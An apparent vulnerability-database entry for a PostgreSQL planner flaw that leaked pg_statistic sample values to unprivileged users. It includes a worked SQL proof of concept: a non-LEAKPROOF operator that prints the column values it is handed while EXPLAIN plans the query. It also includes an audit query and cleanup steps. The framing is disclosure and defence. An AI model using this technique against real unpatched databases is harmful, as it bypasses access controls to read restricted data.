Description
Some selectivity estimation functions in PostgreSQL before 9.2.21, 9.3.x before 9.3.17, 9.4.x before 9.4.12, 9.5.x before 9.5.7, and 9.6.x before 9.6.3 did not check user privileges before using data from pg_statistic (the planner's per-column statistics, such as most-common values and histogram bounds), a catalog that ordinary users cannot read directly. When the planner estimates the selectivity of a WHERE clause it may apply the operator's implementation function to those stored values, and it does so before table permissions are checked; a user-defined operator whose function records its arguments can therefore capture them. An unprivileged attacker could use this flaw to read sample values from columns of tables they are otherwise not allowed to access. The fixed versions fall back to a default estimate when the operator's function is not marked LEAKPROOF and the caller lacks SELECT privilege on the column.
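The following is an added worked example, not code from this advisory or from the PostgreSQL project. It reproduces the leak channel described in the PostgreSQL release announcement listed under References (a non-LEAKPROOF user-defined operator fed pg_statistic values during planning) on a throwaway test instance, and shows what a fixed server does instead. All names (role peeker, table accounts, column email, function leaky_eq, operator ===) are assumptions for the demonstration; run it as a superuser on a database you can discard.

```sql
-- Added example (not from the advisory or from PostgreSQL itself).
-- Assumed names: role "peeker", table "accounts", column "email",
-- function "leaky_eq", operator "===". Run as a superuser on a test database.

-- 1. Sensitive table, populated and ANALYZEd so that pg_statistic holds a
--    most-common-values (MCV) list for accounts.email.
CREATE TABLE accounts (id serial PRIMARY KEY, email text);
INSERT INTO accounts (email)
SELECT 'user' || (i % 20) || '@example.com' FROM generate_series(1, 2000) AS i;
ANALYZE accounts;

-- 2. A role with no privileges on the table at all.
CREATE ROLE peeker;
REVOKE ALL ON accounts FROM peeker;   -- nothing was granted; be explicit anyway

-- 3. A "leaky" operator: its implementation function is not LEAKPROOF and
--    reports every left-hand value it is handed. eqsel, the stock restriction
--    estimator for equality operators, calls the operator's function on each
--    MCV entry while planning, which is where the leak happens.
CREATE FUNCTION leaky_eq(text, text) RETURNS boolean
LANGUAGE plpgsql AS $$
BEGIN
  RAISE NOTICE 'leaky_eq was handed: %', $1;
  RETURN $1 = $2;
END $$;
CREATE OPERATOR === (
  LEFTARG   = text,
  RIGHTARG  = text,
  PROCEDURE = leaky_eq,   -- "FUNCTION =" is the preferred spelling on 12+
  RESTRICT  = eqsel
);
GRANT EXECUTE ON FUNCTION leaky_eq(text, text) TO peeker;

-- 4. Plan a query as "peeker". Planning runs before the executor's permission
--    check, so on an unpatched server the NOTICE lines reveal MCV entries of
--    accounts.email and only then does the "permission denied" error follow.
--    On a fixed version (9.2.21 / 9.3.17 / 9.4.12 / 9.5.7 / 9.6.3 and later)
--    the estimator uses a default selectivity, no NOTICE is emitted, and the
--    statement fails with "permission denied" only.
SET ROLE peeker;
EXPLAIN SELECT * FROM accounts WHERE email === 'nobody@example.com';
RESET ROLE;

-- 5. Audit query for a fixed server: operators that have a restriction
--    estimator and whose implementation function is not LEAKPROOF are the
--    ones the planner will now refuse to feed statistics to when the caller
--    lacks SELECT on the column. Most built-in comparison operators are
--    leakproof; user-defined ones normally are not, which is the safe default.
SELECT o.oprname, p.proname, p.proleakproof
FROM pg_operator o
JOIN pg_proc p ON p.oid = o.oprcode
WHERE NOT p.proleakproof
  AND o.oprrest::oid <> 0
ORDER BY o.oprname, p.proname;

-- Cleanup.
DROP OPERATOR === (text, text);
DROP FUNCTION leaky_eq(text, text);
DROP TABLE accounts;
DROP ROLE peeker;
```

The demonstration uses EXPLAIN deliberately: the leak is in planning, so the query never needs to execute. Marking a user-defined function LEAKPROOF re-enables statistics for it even for callers without SELECT privilege, so only do that for functions that genuinely cannot reveal their inputs (no errors or messages that depend on argument values).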
References (10)
Third Party Advisory, VDB Entry (SecurityTracker): http://www.securitytracker.com/id/1038476
Third Party Advisory (Debian DSA-3851): http://www.debian.org/security/2017/dsa-3851
Vendor Advisory (Red Hat RHSA-2017:2425): https://access.redhat.com/errata/RHSA-2017:2425
Vendor Advisory (Red Hat RHSA-2017:1678): https://access.redhat.com/errata/RHSA-2017:1678
Vendor Advisory (Red Hat RHSA-2017:1677): https://access.redhat.com/errata/RHSA-2017:1677
Vendor Advisory (Red Hat RHSA-2017:1983): https://access.redhat.com/errata/RHSA-2017:1983
Vendor Advisory (PostgreSQL release announcement, vendor confirmation): https://www.postgresql.org/about/news/1746/
Vendor Advisory (Red Hat RHSA-2017:1838): https://access.redhat.com/errata/RHSA-2017:1838
Third Party Advisory, VDB Entry (SecurityFocus BID 98459): http://www.securityfocus.com/bid/98459
Third Party Advisory (Gentoo GLSA 201710-06): https://security.gentoo.org/glsa/201710-06
Scores
CVSS v3: 7.5 (High)
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N (Attack Vector: Network; Confidentiality impact: High; no integrity or availability impact)
EPSS: 0.0129 (1.29%); EPSS percentile: 79.9%
Note: the vector scores PR:N, but in practice exploitation requires a database login and an operator whose implementation function is not LEAKPROOF and whose behaviour the attacker can observe (typically one the attacker creates), so the realistic precondition is an authenticated, low-privilege database user.
Details
CWE
CWE-200
CWE-285
Status
published
Products (41)
postgresql/postgresql: 9.3, 9.3.1, 9.3.2, 9.3.3, 9.3.4, 9.3.5, 9.3.6, 9.3.7, 9.3.8, 9.3.9, ... and 31 more
Published
May 12, 2017
Tracked Since
Feb 18, 2026